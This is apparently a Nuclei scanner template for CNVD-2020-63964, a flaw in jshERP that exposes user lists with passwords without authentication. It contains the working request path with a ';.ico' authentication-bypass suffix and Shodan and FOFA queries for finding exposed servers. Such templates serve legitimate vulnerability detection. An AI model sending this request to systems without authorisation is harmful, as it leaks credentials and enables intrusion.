CNVD-2020-63964: jshERP - Information Disclosure

id: CNVD-2020-63964

info:
  name: jshERP - Information Disclosure
  author: brucelsone
  severity: high
  description: |
    jshERP that can reveal sensitive information including system credentials without credentials.
  reference:
    - https://cn-sec.com/archives/1798444.html
  classification:
    cpe: cpe:2.3:a:jishenghua:jsherp:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: jishenghua
    product: jsherp
    shodan-query: http.favicon.hash:-1298131932
    fofa-query: jshERP-boot
  tags: cnvd,cnvd2020,jsherp,disclosure

http:
  - method: GET
    path:
      - "{{BaseURL}}/jshERP-boot/user/getAllList;.ico"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"username":'
          - '"loginName":'
          - '"password":'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 490a0046304402204b856dfa04f29ff2e246942b9feeb1e550114793e8a44ecb312f3f8f373417df02206fbb893085fd4f8d1854376b7b4c30ba21a2988f57b4f51dab06228f4edc5fe4:922c64590222798bb761d5b6d8e72950